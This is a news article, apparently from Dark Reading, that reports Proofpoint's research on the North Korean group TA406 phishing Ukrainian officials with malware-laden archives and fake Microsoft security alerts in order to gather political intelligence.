The report suggests that TA406 is trying to assess the risks faced by North Korean personnel already deployed in Ukraine alongside Russian forces. It may also be collecting information to help North Korean authorities prepare for any future requests from Russia for additional military support.
This marks a shift in TA406’s focus. The group has previously targeted diplomatic and government entities in countries like the United States, South Korea, and Russia. Despite this change in target, TA406 continues to use familiar tactics such as phishing, malware distribution, and credential theft.
Phishing Campaigns and Malware Attacks
Proofpoint found that TA406 sent phishing emails to Ukrainian officials using fake identities, including a made-up think tank named the “Royal Institute of Strategic Studies.” The emails contained links to a file hosted on the MEGA platform, disguised as an “AnalyticalReport.rar.” When opened, the file released malware via a Compiled HTML Help (CHM) file, which executed a PowerShell script to connect to a malicious website.
If the targets did not respond immediately, the attackers sent follow-up emails to pressure them into opening the file.
In more advanced attacks, the hackers used PowerShell scripts to gather detailed system information, such as network settings, system details, recent files, disk usage, and antivirus status. This data was then sent to an attacker-controlled server. The malware also ensured long-term access by creating an autorun file in the system’s APPDATA folder.
In other cases, the phishing emails contained an HTML file that led to a ZIP archive. This archive included a harmless PDF and a malicious shortcut file named “Why Zelenskyy fired Zaluzhnyi.lnk.” When the shortcut was opened, it launched another PowerShell script that created a scheduled task to run malicious JavaScript.
Credential Theft and Fake Alerts
TA406 also used fake Microsoft security alerts sent from Proton Mail accounts. These emails warned of suspicious login attempts and urged users to click a verification link, which led to a credential-harvesting website.
“TA406’s campaign is likely intended to support strategic intelligence gathering for North Korea’s leadership,” said Greg Lesnewich, a senior threat researcher at Proofpoint. He added that the group seems focused on political intelligence rather than military operations on the battlefield.
Part of a Larger Network
TA406 is one of three hacker groups associated with the North Korean cyber-espionage umbrella known as “Kimsuky.” The other two are TA408 and TA427. While TA408 and TA427 have not targeted Ukraine directly, TA427 has shown interest in Ukraine-related information by targeting Western organizations.
Active since at least 2012, TA406 is known for using both malware and phishing attacks. The group has used tools like Konni, Sanny, BabyShark, and Amadey in previous operations. Recent attacks by related groups have also used fake documents like work logs and insurance files to trick users into launching malware.
The latest campaign highlights how cyber threats are evolving as geopolitical conflicts continue to deepen. Experts warn that such operations not only risk data theft but could also influence military and political strategies.
Source: Dark Reading
Tags:
Cybercrime in World
